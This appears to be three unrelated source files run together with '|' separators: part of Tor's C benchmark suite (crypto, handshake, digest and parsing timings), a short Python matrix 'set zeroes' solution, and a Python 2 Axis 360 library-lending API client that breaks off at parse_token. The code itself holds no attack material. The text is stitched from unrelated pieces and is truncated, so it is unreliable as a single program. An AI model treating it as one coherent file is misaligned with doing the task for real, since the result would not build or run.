crypto_rand((char *)nodeid, sizeof(nodeid));
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
onion_skin_ntor_create(nodeid, &keypair1.pubkey, &state, os);
ntor_handshake_state_free(state);
state = NULL;
}
end = perftime();
printf("Client-side, part 1: %f usec.\n", NANOCOUNT(start, end, iters)/1e3);
state = NULL;
onion_skin_ntor_create(nodeid, &keypair1.pubkey, &state, os);
start = perftime();
for (i = 0; i < iters; ++i) {
uint8_t key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_ntor_server_handshake(os, keymap, NULL, nodeid, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side: %f usec\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
uint8_t key_out[CPATH_KEY_MATERIAL_LEN];
int s;
s = onion_skin_ntor_client_handshake(state, or, key_out, sizeof(key_out),
NULL);
tor_assert(s == 0);
}
end = perftime();
printf("Client-side, part 2: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
ntor_handshake_state_free(state);
dimap_free(keymap, NULL);
}
static void
bench_onion_ntor(void)
{
int ed;
for (ed = 0; ed <= 1; ++ed) {
printf("Ed25519-based basepoint multiply = %s.\n",
(ed == 0) ? "disabled" : "enabled");
curve25519_set_impl_params(ed);
bench_onion_ntor_impl();
}
}
static void
bench_ed25519_impl(void)
{
uint64_t start, end;
const int iters = 1<<12;
int i;
const uint8_t msg[] = "but leaving, could not tell what they had heard";
ed25519_signature_t sig;
ed25519_keypair_t kp;
curve25519_keypair_t curve_kp;
ed25519_public_key_t pubkey_tmp;
ed25519_secret_key_generate(&kp.seckey, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_key_generate(&kp.pubkey, &kp.seckey);
}
end = perftime();
printf("Generate public key: %.2f usec\n",
MICROCOUNT(start, end, iters));
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_sign(&sig, msg, sizeof(msg), &kp);
}
end = perftime();
printf("Sign a short message: %.2f usec\n",
MICROCOUNT(start, end, iters));
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_checksig(&sig, msg, sizeof(msg), &kp.pubkey);
}
end = perftime();
printf("Verify signature: %.2f usec\n",
MICROCOUNT(start, end, iters));
curve25519_keypair_generate(&curve_kp, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_key_from_curve25519_public_key(&pubkey_tmp,
&curve_kp.pubkey, 1);
}
end = perftime();
printf("Convert public point from curve25519: %.2f usec\n",
MICROCOUNT(start, end, iters));
curve25519_keypair_generate(&curve_kp, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_blind(&pubkey_tmp, &kp.pubkey, msg);
}
end = perftime();
printf("Blind a public key: %.2f usec\n",
MICROCOUNT(start, end, iters));
}
static void
bench_ed25519(void)
{
int donna;
for (donna = 0; donna <= 1; ++donna) {
printf("Ed25519-donna = %s.\n",
(donna == 0) ? "disabled" : "enabled");
ed25519_set_impl_params(donna);
bench_ed25519_impl();
}
}
static void
bench_rand_len(int len)
{
const int N = 100000;
int i;
char *buf = tor_malloc(len);
uint64_t start,end;
start = perftime();
for (i = 0; i < N; ++i) {
crypto_rand(buf, len);
}
end = perftime();
printf("crypto_rand(%d): %f nsec.\n", len, NANOCOUNT(start,end,N));
crypto_fast_rng_t *fr = crypto_fast_rng_new();
start = perftime();
for (i = 0; i < N; ++i) {
crypto_fast_rng_getbytes(fr,(uint8_t*)buf,len);
}
end = perftime();
printf("crypto_fast_rng_getbytes(%d): %f nsec.\n", len,
NANOCOUNT(start,end,N));
crypto_fast_rng_free(fr);
if (len <= 32) {
start = perftime();
for (i = 0; i < N; ++i) {
crypto_strongest_rand((uint8_t*)buf, len);
}
end = perftime();
printf("crypto_strongest_rand(%d): %f nsec.\n", len,
NANOCOUNT(start,end,N));
}
if (len == 4) {
tor_weak_rng_t weak;
tor_init_weak_random(&weak, 1337);
start = perftime();
uint32_t t=0;
for (i = 0; i < N; ++i) {
t += tor_weak_random(&weak);
}
end = perftime();
printf("weak_rand(4): %f nsec.\n", NANOCOUNT(start,end,N));
}
tor_free(buf);
}
static void
bench_rand(void)
{
bench_rand_len(4);
bench_rand_len(16);
bench_rand_len(128);
}
static void
bench_cell_aes(void)
{
uint64_t start, end;
const int len = 509;
const int iters = (1<<16);
const int max_misalign = 15;
char *b = tor_malloc(len+max_misalign);
crypto_cipher_t *c;
int i, misalign;
char key[CIPHER_KEY_LEN];
crypto_rand(key, sizeof(key));
c = crypto_cipher_new(key);
reset_perftime();
for (misalign = 0; misalign <= max_misalign; ++misalign) {
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_cipher_crypt_inplace(c, b+misalign, len);
}
end = perftime();
printf("%d bytes, misaligned by %d: %.2f nsec per byte\n", len, misalign,
NANOCOUNT(start, end, iters*len));
}
crypto_cipher_free(c);
tor_free(b);
}
/** Run digestmap_t performance benchmarks. */
static void
bench_dmap(void)
{
smartlist_t *sl = smartlist_new();
smartlist_t *sl2 = smartlist_new();
uint64_t start, end, pt2, pt3, pt4;
int iters = 8192;
const int elts = 4000;
const int fpostests = 100000;
char d[20];
int i,n=0, fp = 0;
digestmap_t *dm = digestmap_new();
digestset_t *ds = digestset_new(elts);
for (i = 0; i < elts; ++i) {
crypto_rand(d, 20);
smartlist_add(sl, tor_memdup(d, 20));
}
for (i = 0; i < elts; ++i) {
crypto_rand(d, 20);
smartlist_add(sl2, tor_memdup(d, 20));
}
//printf("nbits=%d\n", ds->mask+1);
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestmap_set(dm, cp, (void*)1));
}
pt2 = perftime();
printf("digestmap_set: %.2f ns per element\n",
NANOCOUNT(start, pt2, iters*elts));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestmap_get(dm, cp));
SMARTLIST_FOREACH(sl2, const char *, cp, digestmap_get(dm, cp));
}
pt3 = perftime();
printf("digestmap_get: %.2f ns per element\n",
NANOCOUNT(pt2, pt3, iters*elts*2));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestset_add(ds, cp));
}
pt4 = perftime();
printf("digestset_add: %.2f ns per element\n",
NANOCOUNT(pt3, pt4, iters*elts));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp,
n += digestset_probably_contains(ds, cp));
SMARTLIST_FOREACH(sl2, const char *, cp,
n += digestset_probably_contains(ds, cp));
}
end = perftime();
printf("digestset_probably_contains: %.2f ns per element.\n",
NANOCOUNT(pt4, end, iters*elts*2));
/* We need to use this, or else the whole loop gets optimized out. */
printf("Hits == %d\n", n);
for (i = 0; i < fpostests; ++i) {
crypto_rand(d, 20);
if (digestset_probably_contains(ds, d)) ++fp;
}
printf("False positive rate on digestset: %.2f%%\n",
(fp/(double)fpostests)*100);
digestmap_free(dm, NULL);
digestset_free(ds);
SMARTLIST_FOREACH(sl, char *, cp, tor_free(cp));
SMARTLIST_FOREACH(sl2, char *, cp, tor_free(cp));
smartlist_free(sl);
smartlist_free(sl2);
}
static void
bench_siphash(void)
{
char buf[128];
int lens[] = { 7, 8, 15, 16, 20, 32, 111, 128, -1 };
int i, j;
uint64_t start, end;
const int N = 300000;
crypto_rand(buf, sizeof(buf));
for (i = 0; lens[i] > 0; ++i) {
reset_perftime();
start = perftime();
for (j = 0; j < N; ++j) {
siphash24g(buf, lens[i]);
}
end = perftime();
printf("siphash24g(%d): %.2f ns per call\n",
lens[i], NANOCOUNT(start,end,N));
}
}
static void
bench_digest(void)
{
char buf[8192];
char out[DIGEST512_LEN];
const int lens[] = { 1, 16, 32, 64, 128, 512, 1024, 2048, -1 };
const int N = 300000;
uint64_t start, end;
crypto_rand(buf, sizeof(buf));
for (int alg = 0; alg < N_DIGEST_ALGORITHMS; alg++) {
for (int i = 0; lens[i] > 0; ++i) {
reset_perftime();
start = perftime();
int failures = 0;
for (int j = 0; j < N; ++j) {
switch (alg) {
case DIGEST_SHA1:
failures += crypto_digest(out, buf, lens[i]) < 0;
break;
case DIGEST_SHA256:
case DIGEST_SHA3_256:
failures += crypto_digest256(out, buf, lens[i], alg) < 0;
break;
case DIGEST_SHA512:
case DIGEST_SHA3_512:
failures += crypto_digest512(out, buf, lens[i], alg) < 0;
break;
default:
tor_assert(0);
}
}
end = perftime();
printf("%s(%d): %.2f ns per call\n",
crypto_digest_algorithm_get_name(alg),
lens[i], NANOCOUNT(start,end,N));
if (failures)
printf("ERROR: crypto_digest failed %d times.\n", failures);
}
}
}
static void
bench_cell_ops(void)
{
const int iters = 1<<16;
int i;
/* benchmarks for cell ops at relay. */
or_circuit_t *or_circ = tor_malloc_zero(sizeof(or_circuit_t));
cell_t *cell = tor_malloc(sizeof(cell_t));
int outbound;
uint64_t start, end;
crypto_rand((char*)cell->payload, sizeof(cell->payload));
/* Mock-up or_circuit_t */
or_circ->base_.magic = OR_CIRCUIT_MAGIC;
or_circ->base_.purpose = CIRCUIT_PURPOSE_OR;
/* Initialize crypto */
char key1[CIPHER_KEY_LEN], key2[CIPHER_KEY_LEN];
crypto_rand(key1, sizeof(key1));
crypto_rand(key2, sizeof(key2));
or_circ->crypto.f_crypto = crypto_cipher_new(key1);
or_circ->crypto.b_crypto = crypto_cipher_new(key2);
or_circ->crypto.f_digest = crypto_digest_new();
or_circ->crypto.b_digest = crypto_digest_new();
reset_perftime();
for (outbound = 0; outbound <= 1; ++outbound) {
cell_direction_t d = outbound ? CELL_DIRECTION_OUT : CELL_DIRECTION_IN;
start = perftime();
for (i = 0; i < iters; ++i) {
char recognized = 0;
crypt_path_t *layer_hint = NULL;
relay_decrypt_cell(TO_CIRCUIT(or_circ), cell, d,
&layer_hint, &recognized);
}
end = perftime();
printf("%sbound cells: %.2f ns per cell. (%.2f ns per byte of payload)\n",
outbound?"Out":" In",
NANOCOUNT(start,end,iters),
NANOCOUNT(start,end,iters*CELL_PAYLOAD_SIZE));
}
relay_crypto_clear(&or_circ->crypto);
tor_free(or_circ);
tor_free(cell);
}
static void
bench_dh(void)
{
const int iters = 1<<10;
int i;
uint64_t start, end;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
char dh_pubkey_a[DH1024_KEY_LEN], dh_pubkey_b[DH1024_KEY_LEN];
char secret_a[DH1024_KEY_LEN], secret_b[DH1024_KEY_LEN];
ssize_t slen_a, slen_b;
crypto_dh_t *dh_a = crypto_dh_new(DH_TYPE_TLS);
crypto_dh_t *dh_b = crypto_dh_new(DH_TYPE_TLS);
crypto_dh_generate_public(dh_a);
crypto_dh_generate_public(dh_b);
crypto_dh_get_public(dh_a, dh_pubkey_a, sizeof(dh_pubkey_a));
crypto_dh_get_public(dh_b, dh_pubkey_b, sizeof(dh_pubkey_b));
slen_a = crypto_dh_compute_secret(LOG_NOTICE,
dh_a, dh_pubkey_b, sizeof(dh_pubkey_b),
secret_a, sizeof(secret_a));
slen_b = crypto_dh_compute_secret(LOG_NOTICE,
dh_b, dh_pubkey_a, sizeof(dh_pubkey_a),
secret_b, sizeof(secret_b));
tor_assert(slen_a == slen_b);
tor_assert(fast_memeq(secret_a, secret_b, slen_a));
crypto_dh_free(dh_a);
crypto_dh_free(dh_b);
}
end = perftime();
printf("Complete DH handshakes (1024 bit, public and private ops):\n"
" %f millisec each.\n", NANOCOUNT(start, end, iters)/1e6);
}
#ifdef ENABLE_OPENSSL
static void
bench_ecdh_impl(int nid, const char *name)
{
const int iters = 1<<10;
int i;
uint64_t start, end;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
char secret_a[DH1024_KEY_LEN], secret_b[DH1024_KEY_LEN];
ssize_t slen_a, slen_b;
EC_KEY *dh_a = EC_KEY_new_by_curve_name(nid);
EC_KEY *dh_b = EC_KEY_new_by_curve_name(nid);
if (!dh_a || !dh_b) {
puts("Skipping. (No implementation?)");
return;
}
EC_KEY_generate_key(dh_a);
EC_KEY_generate_key(dh_b);
slen_a = ECDH_compute_key(secret_a, DH1024_KEY_LEN,
EC_KEY_get0_public_key(dh_b), dh_a,
NULL);
slen_b = ECDH_compute_key(secret_b, DH1024_KEY_LEN,
EC_KEY_get0_public_key(dh_a), dh_b,
NULL);
tor_assert(slen_a == slen_b);
tor_assert(fast_memeq(secret_a, secret_b, slen_a));
EC_KEY_free(dh_a);
EC_KEY_free(dh_b);
}
end = perftime();
printf("Complete ECDH %s handshakes (2 public and 2 private ops):\n"
" %f millisec each.\n", name, NANOCOUNT(start, end, iters)/1e6);
}
static void
bench_ecdh_p256(void)
{
bench_ecdh_impl(NID_X9_62_prime256v1, "P-256");
}
static void
bench_ecdh_p224(void)
{
bench_ecdh_impl(NID_secp224r1, "P-224");
}
#endif
static void
bench_md_parse(void)
{
uint64_t start, end;
const int N = 100000;
// selected arbitrarily
const char md_text[] =
"@last-listed 2018-12-14 18:14:14\n"
"onion-key\n"
"-----BEGIN RSA PUBLIC KEY-----\n"
"MIGJAoGBAMHkZeXNDX/49JqM2BVLmh1Fnb5iMVnatvZZTLJyedqDLkbXZ1WKP5oh\n"
"7ec14dj/k3ntpwHD4s2o3Lb6nfagWbug4+F/rNJ7JuFru/PSyOvDyHGNAuegOXph\n"
"3gTGjdDpv/yPoiadGebbVe8E7n6hO+XxM2W/4dqheKimF0/s9B7HAgMBAAE=\n"
"-----END RSA PUBLIC KEY-----\n"
"ntor-onion-key QgF/EjqlNG1wRHLIop/nCekEH+ETGZSgYOhu26eiTF4=\n"
"family $00E9A86E7733240E60D8435A7BBD634A23894098 "
"$329BD7545DEEEBBDC8C4285F243916F248972102 "
"$69E06EBB2573A4F89330BDF8BC869794A3E10E4D "
"$DCA2A3FAE50B3729DAA15BC95FB21AF03389818B\n"
"p accept 53,80,443,5222-5223,25565\n"
"id ed25519 BzffzY99z6Q8KltcFlUTLWjNTBU7yKK+uQhyi1Ivb3A\n";
reset_perftime();
start = perftime();
for (int i = 0; i < N; ++i) {
smartlist_t *s = microdescs_parse_from_string(md_text, NULL, 1,
SAVED_IN_CACHE, NULL);
SMARTLIST_FOREACH(s, microdesc_t *, md, microdesc_free(md));
smartlist_free(s);
}
end = perftime();
printf("Microdesc parse: %f nsec\n", NANOCOUNT(start, end, N));
}
typedef void (*bench_fn)(void);
typedef struct benchmark_t {
const char *name;
bench_fn fn;
int enabled;
} benchmark_t;
#define ENT(s) { #s , bench_##s, 0 }
static struct benchmark_t benchmarks[] = {
ENT(dmap),
ENT(siphash),
ENT(digest),
ENT(aes),
ENT(onion_TAP),
ENT(onion_ntor),
ENT(ed25519),
ENT(rand),
ENT(cell_aes),
ENT(cell_ops),
ENT(dh),
#ifdef ENABLE_OPENSSL
ENT(ecdh_p256),
ENT(ecdh_p224),
#endif
ENT(md_parse),
{NULL,NULL,0}
};
static benchmark_t *
find_benchmark(const char *name)
{
benchmark_t *b;
for (b = benchmarks; b->name; ++b) {
if (!strcmp(name, b->name)) {
return b;
}
}
return NULL;
}
/** Main entry point for benchmark code: parse the command line, and run
* some benchmarks. */
int
main(int argc, const char **argv)
{
int i;
int list=0, n_enabled=0;
char *errmsg;
or_options_t *options;
subsystems_init_upto(SUBSYS_LEVEL_LIBS);
flush_log_messages_from_startup();
tor_compress_init();
if (argc == 4 && !strcmp(argv[1], "diff")) {
const int N = 200;
char *f1 = read_file_to_str(argv[2], RFTS_BIN, NULL);
char *f2 = read_file_to_str(argv[3], RFTS_BIN, NULL);
if (! f1 || ! f2) {
perror("X");
return 1;
}
size_t f1len = strlen(f1);
size_t f2len = strlen(f2);
for (i = 0; i < N; ++i) {
char *diff = consensus_diff_generate(f1, f1len, f2, f2len);
tor_free(diff);
}
char *diff = consensus_diff_generate(f1, f1len, f2, f2len);
printf("%s", diff);
tor_free(f1);
tor_free(f2);
tor_free(diff);
return 0;
}
for (i = 1; i < argc; ++i) {
if (!strcmp(argv[i], "--list")) {
list = 1;
} else {
benchmark_t *benchmark = find_benchmark(argv[i]);
++n_enabled;
if (benchmark) {
benchmark->enabled = 1;
} else {
printf("No such benchmark as %s\n", argv[i]);
}
}
}
reset_perftime();
if (crypto_global_init(0, NULL, NULL) < 0) {
printf("Couldn't seed RNG; exiting.\n");
return 1;
}
init_protocol_warning_severity_level();
options = options_new();
options->command = CMD_RUN_UNITTESTS;
options->DataDirectory = tor_strdup("");
options->KeyDirectory = tor_strdup("");
options->CacheDirectory = tor_strdup("");
options_init(options);
if (set_options(options, &errmsg) < 0) {
printf("Failed to set initial options: %s\n", errmsg);
tor_free(errmsg);
return 1;
}
for (benchmark_t *b = benchmarks; b->name; ++b) {
if (b->enabled || n_enabled == 0) {
printf("===== %s =====\n", b->name);
if (!list)
b->fn();
}
}
return 0;
}
|
from typing import List
class Solution1:
def set_zeroes(self, matrix: List[List[int]]) -> None:
num_rows = len(matrix)
num_cols = len(matrix[0])
col_0 = 1
for i in range(num_rows):
if matrix[i][0] == 0:
col_0 = 0
for j in range(1, num_cols):
if matrix[i][j] == 0:
matrix[i][0] = 0
matrix[0][j] = 0
for i in range(num_rows-1, -1, -1):
for j in range(num_cols-1, 0, -1):
if matrix[i][0] == 0 or matrix[0][j] == 0:
matrix[i][j] = 0
matrix[i][0] = 0 if col_0 == 0 else matrix[i][0]
|
import base64
import json
import logging
import os
import re
from collections import defaultdict
from datetime import datetime, timedelta
from flask_babel import lazy_gettext as _
from lxml import etree
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm.session import Session
from core.analytics import Analytics
from core.config import (
CannotLoadConfiguration,
Configuration,
temp_config,
)
from core.coverage import (
BibliographicCoverageProvider,
CoverageFailure,
)
from core.metadata_layer import (
CirculationData,
ContributorData,
FormatData,
IdentifierData,
LinkData,
Metadata,
ReplacementPolicy,
SubjectData,
)
from core.model import (
CirculationEvent,
Classification,
Collection,
Contributor,
DataSource,
DeliveryMechanism,
Edition,
ExternalIntegration,
get_one,
get_one_or_create,
Hyperlink,
Identifier,
Library,
LicensePool,
LinkRelations,
MediaTypes,
Representation,
Session,
Subject,
)
from core.monitor import (
CollectionMonitor,
IdentifierSweepMonitor,
TimelineMonitor,
)
from core.opds_import import (
MetadataWranglerOPDSLookup
)
from core.testing import DatabaseTest
from core.util import LanguageCodes
from core.util.xmlparser import XMLParser
from core.util.http import (
HTTP,
RemoteIntegrationException,
)
from authenticator import Authenticator
from circulation import (
APIAwareFulfillmentInfo,
LoanInfo,
FulfillmentInfo,
HoldInfo,
BaseCirculationAPI
)
from circulation_exceptions import *
from selftest import (
HasCollectionSelfTests,
SelfTestResult,
)
from web_publication_manifest import (
FindawayManifest,
SpineItem,
)
class Axis360API(Authenticator, BaseCirculationAPI, HasCollectionSelfTests):
NAME = ExternalIntegration.AXIS_360
SET_DELIVERY_MECHANISM_AT = BaseCirculationAPI.BORROW_STEP
SERVICE_NAME = "Axis 360"
PRODUCTION_BASE_URL = "https://axis360api.baker-taylor.com/Services/VendorAPI/"
QA_BASE_URL = "http://axis360apiqa.baker-taylor.com/Services/VendorAPI/"
SERVER_NICKNAMES = {
"production" : PRODUCTION_BASE_URL,
"qa" : QA_BASE_URL,
}
DATE_FORMAT = "%m-%d-%Y %H:%M:%S"
SETTINGS = [
{ "key": ExternalIntegration.USERNAME, "label": _("Username"), "required": True },
{ "key": ExternalIntegration.PASSWORD, "label": _("Password"), "required": True },
{ "key": Collection.EXTERNAL_ACCOUNT_ID_KEY, "label": _("Library ID"), "required": True },
{ "key": ExternalIntegration.URL,
"label": _("Server"),
"default": PRODUCTION_BASE_URL,
"required": True,
"format": "url",
"allowed": SERVER_NICKNAMES.keys(),
},
] + BaseCirculationAPI.SETTINGS
LIBRARY_SETTINGS = BaseCirculationAPI.LIBRARY_SETTINGS + [
BaseCirculationAPI.DEFAULT_LOAN_DURATION_SETTING
]
access_token_endpoint = 'accesstoken'
availability_endpoint = 'availability/v2'
fulfillment_endpoint = 'getfullfillmentInfo/v2'
audiobook_metadata_endpoint = 'getaudiobookmetadata/v2'
log = logging.getLogger("Axis 360 API")
# Create a lookup table between common DeliveryMechanism identifiers
# and Axis 360 format types.
epub = Representation.EPUB_MEDIA_TYPE
pdf = Representation.PDF_MEDIA_TYPE
adobe_drm = DeliveryMechanism.ADOBE_DRM
findaway_drm = DeliveryMechanism.FINDAWAY_DRM
no_drm = DeliveryMechanism.NO_DRM
axisnow_drm = DeliveryMechanism.AXISNOW_DRM
# The name Axis 360 gives to its web interface. We use it as the
# name for the underlying access control system.
AXISNOW = "AxisNow"
delivery_mechanism_to_internal_format = {
(epub, no_drm): 'ePub',
(epub, adobe_drm): 'ePub',
(pdf, no_drm): 'PDF',
(pdf, adobe_drm): 'PDF',
(None, findaway_drm): 'Acoustik',
(None, axisnow_drm): AXISNOW,
}
def __init__(self, _db, collection):
if collection.protocol != ExternalIntegration.AXIS_360:
raise ValueError(
"Collection protocol is %s, but passed into Axis360API!" %
collection.protocol
)
self._db = _db
self.library_id = collection.external_account_id
self.username = collection.external_integration.username
self.password = collection.external_integration.password
# Convert the nickname for a server into an actual URL.
base_url = collection.external_integration.url or self.PRODUCTION_BASE_URL
if base_url in self.SERVER_NICKNAMES:
base_url = self.SERVER_NICKNAMES[base_url]
if not base_url.endswith('/'):
base_url += '/'
self.base_url = base_url
if (not self.library_id or not self.username
or not self.password):
raise CannotLoadConfiguration(
"Axis 360 configuration is incomplete."
)
# Use utf8 instead of unicode encoding
settings = [self.library_id, self.username, self.password]
self.library_id, self.username, self.password = (
setting.encode('utf8') for setting in settings
)
self.token = None
self.collection_id = collection.id
@property
def collection(self):
return Collection.by_id(self._db, id=self.collection_id)
@property
def source(self):
return DataSource.lookup(self._db, DataSource.AXIS_360)
@property
def authorization_headers(self):
authorization = u":".join([self.username, self.password, self.library_id])
authorization = authorization.encode("utf_16_le")
authorization = base64.standard_b64encode(authorization)
return dict(Authorization="Basic " + authorization)
def external_integration(self, _db):
return self.collection.external_integration
def _run_self_tests(self, _db):
result = self.run_test(
"Refreshing bearer token", self.refresh_bearer_token
)
yield result
if not result.success:
# If we can't get a bearer token, there's no point running
# the rest of the tests.
return
def _count_events():
now = datetime.utcnow()
five_minutes_ago = now - timedelta(minutes=5)
count = len(list(self.recent_activity(since=five_minutes_ago)))
return "Found %d event(s)" % count
yield self.run_test(
"Asking for circulation events for the last five minutes",
_count_events
)
for result in self.default_patrons(self.collection):
if isinstance(result, SelfTestResult):
yield result
continue
library, patron, pin = result
def _count_activity():
result = self.patron_activity(patron, pin)
return "Found %d loans/holds" % len(result)
yield self.run_test(
"Checking activity for test patron for library %s" % library.name,
_count_activity
)
# Run the tests defined by HasCollectionSelfTests
for result in super(Axis360API, self)._run_self_tests():
yield result
def refresh_bearer_token(self):
url = self.base_url + self.access_token_endpoint
headers = self.authorization_headers
response = self._make_request(
url, 'post', headers, allowed_response_codes=[200]
)
return self.parse_token(response.content)
def request(self, url, method='get', extra_headers={}, data=None,
params=None, exception_on_401=False, **kwargs):
"""Make an HTTP request, acquiring/refreshing a bearer token
if necessary.
"""
if not self.token:
self.token = self.refresh_bearer_token()
headers = dict(extra_headers)
headers['Authorization'] = "Bearer " + self.token
headers['Library'] = self.library_id
if exception_on_401:
disallowed_response_codes = ["401"]
else:
disallowed_response_codes = None
response = self._make_request(
url=url, method=method, headers=headers,
data=data, params=params,
disallowed_response_codes=disallowed_response_codes,
**kwargs
)
if response.status_code == 401:
# This must be our first 401, since our second 401 will
# make _make_request raise a RemoteIntegrationException.
#
# The token has expired. Get a new token and try again.
self.token = None
return self.request(
url=url, method=method, extra_headers=extra_headers,
data=data, params=params, exception_on_401=True,
**kwargs
)
else:
return response
def availability(self, patron_id=None, since=None, title_ids=[]):
url = self.base_url + self.availability_endpoint
args = dict()
if since:
since = since.strftime(self.DATE_FORMAT)
args['updatedDate'] = since
if patron_id:
args['patronId'] = patron_id
if title_ids:
args['titleIds'] = ','.join(title_ids)
response = self.request(url, params=args, timeout=None)
return response
def get_fulfillment_info(self, transaction_id):
"""Make a call to the getFulfillmentInfoAPI."""
url = self.base_url + self.fulfillment_endpoint
params = dict(TransactionID=transaction_id)
return self.request(url, "POST", params=params)
def get_audiobook_metadata(self, findaway_content_id):
"""Make a call to the getaudiobookmetadata endpoint."""
base_url = self.base_url
url = base_url + self.audiobook_metadata_endpoint
params = dict(fndcontentid=findaway_content_id)
response = self.request(url, "POST", params=params)
return response
def checkout(self, patron, pin, licensepool, internal_format):
title_id = licensepool.identifier.identifier
patron_id = patron.authorization_identifier
response = self._checkout(title_id, patron_id, internal_format)
try:
return CheckoutResponseParser(
licensepool.collection).process_all(response.content)
except etree.XMLSyntaxError, e:
raise RemoteInitiatedServerError(
response.content, self.SERVICE_NAME
)
def _checkout(self, title_id, patron_id, internal_format):
url = self.base_url + "checkout/v2"
args = dict(titleId=title_id, patronId=patron_id,
format=internal_format)
response = self.request(url, data=args, method="POST")
return response
def fulfill(self, patron, pin, licensepool, internal_format, **kwargs):
"""Fulfill a patron's request for a specific book.
:param kwargs: A container for arguments to fulfill()
which are not relevant to this vendor.
:return: a FulfillmentInfo object.
"""
identifier = licensepool.identifier
# This should include only one 'activity'.
activities = self.patron_activity(patron, pin, licensepool.identifier, internal_format)
for loan in activities:
if not isinstance(loan, LoanInfo):
continue
if not (loan.identifier_type == identifier.type
and loan.identifier == identifier.identifier):
continue
# We've found the remote loan corresponding to this
# license pool.
fulfillment = loan.fulfillment_info
if not fulfillment or not isinstance(fulfillment, FulfillmentInfo):
raise CannotFulfill()
return fulfillment
# If we made it to this point, the patron does not have this
# book checked out.
raise NoActiveLoan()
def checkin(self, patron, pin, licensepool):
pass
def place_hold(self, patron, pin, licensepool, hold_notification_email):
if not hold_notification_email:
hold_notification_email = self.default_notification_email_address(
patron, pin
)
url = self.base_url + "addtoHold/v2"
identifier = licensepool.identifier
title_id = identifier.identifier
patron_id = patron.authorization_identifier
params = dict(titleId=title_id, patronId=patron_id,
email=hold_notification_email)
response = self.request(url, params=params)
hold_info = HoldResponseParser(licensepool.collection).process_all(
response.content)
if not hold_info.identifier:
# The Axis 360 API doesn't return the identifier of the
# item that was placed on hold, so we have to fill it in
# based on our own knowledge.
hold_info.identifier_type = identifier.type
hold_info.identifier = identifier.identifier
return hold_info
def release_hold(self, patron, pin, licensepool):
url = self.base_url + "removeHold/v2"
identifier = licensepool.identifier
title_id = identifier.identifier
patron_id = patron.authorization_identifier
params = dict(titleId=title_id, patronId=patron_id)
response = self.request(url, params=params)
try:
HoldReleaseResponseParser(licensepool.collection).process_all(
response.content)
except NotOnHold:
# Fine, it wasn't on hold and now it's still not on hold.
pass
# If we didn't raise an exception, we're fine.
return True
def patron_activity(self, patron, pin, identifier=None, internal_format=None):
if identifier:
title_ids = [identifier.identifier]
else:
title_ids = None
availability = self.availability(
patron_id=patron.authorization_identifier,
title_ids=title_ids)
return list(AvailabilityResponseParser(self, internal_format).process_all(
availability.content))
def update_availability(self, licensepool):
"""Update the availability information for a single LicensePool.
Part of the CirculationAPI interface.
"""
self.update_licensepools_for_identifiers([licensepool.identifier])
def update_licensepools_for_identifiers(self, identifiers):
"""Update availability and bibliographic information for
a list of books.
If the book has never been seen before, a new LicensePool
will be created for the book.
The book's LicensePool will be updated with current
circulation information.
"""
remainder = set(identifiers)
for bibliographic, availability in self._fetch_remote_availability(
identifiers
):
edition, ignore1, license_pool, ignore2 = self.update_book(
bibliographic, availability
)
identifier = license_pool.identifier
if identifier in remainder:
remainder.remove(identifier)
# We asked Axis about n books. It sent us n-k responses. Those
# k books are the identifiers in `remainder`. These books have
# been removed from the collection without us being notified.
for removed_identifier in remainder:
self._reap(removed_identifier)
def update_book(self, bibliographic, availability, analytics=None):
"""Create or update a single book based on bibliographic
and availability data from the Axis 360 API.
:param bibliographic: A Metadata object containing
bibliographic data about this title.
:param availability: A CirculationData object containing
availability data about this title.
"""
analytics = analytics or Analytics(self._db)
license_pool, new_license_pool = availability.license_pool(
self._db, self.collection, analytics
)
edition, new_edition = bibliographic.edition(self._db)
license_pool.edition = edition
policy = ReplacementPolicy(
identifiers=False,
subjects=True,
contributions=True,
formats=True,
links=True,
analytics=analytics,
)
# NOTE: availability is bibliographic.circulation, so it's a
# little redundant to call availability.apply() -- it's taken
# care of inside bibliographic.apply().
bibliographic.apply(edition, self.collection, replace=policy)
availability.apply(self._db, self.collection, replace=policy)
return edition, new_edition, license_pool, new_license_pool
def _fetch_remote_availability(self, identifiers):
"""Retrieve availability information for the specified identifiers.
:yield: A stream of (Metadata, CirculationData) 2-tuples.
"""
identifier_strings = self.create_identifier_strings(identifiers)
response = self.availability(title_ids=identifier_strings)
parser = BibliographicParser(self.collection)
return parser.process_all(response.content)
def _reap(self, identifier):
"""Update our local circulation information to reflect the fact that
the identified book has been removed from the remote
collection.
"""
collection = self.collection
pool = identifier.licensed_through_collection(collection)
if not pool:
self.log.warn(
"Was about to reap %r but no local license pool in this collection.",
identifier
)
return
if pool.licenses_owned == 0:
# Already reaped.
return
self.log.info("Reaping %r", identifier)
availability = CirculationData(
data_source=pool.data_source,
primary_identifier=identifier,
licenses_owned=0,
licenses_available=0,
licenses_reserved=0,
patrons_in_hold_queue=0,
)
availability.apply(
self._db, collection,
ReplacementPolicy.from_license_source(self._db)
)
def recent_activity(self, since):
"""Find books that have had recent activity.
:yield: A sequence of (Metadata, CirculationData) 2-tuples
"""
availability = self.availability(since=since)
content = availability.content
for bibliographic, circulation in BibliographicParser(self.collection).process_all(
content):
yield bibliographic, circulation
@classmethod
def create_identifier_strings(cls, identifiers):
identifier_strings = []
for i in identifiers:
if isinstance(i, Identifier):
value = i.identifier
else:
value = i
identifier_strings.append(value)
return identifier_strings
@classmethod
def parse_token(cls, token):
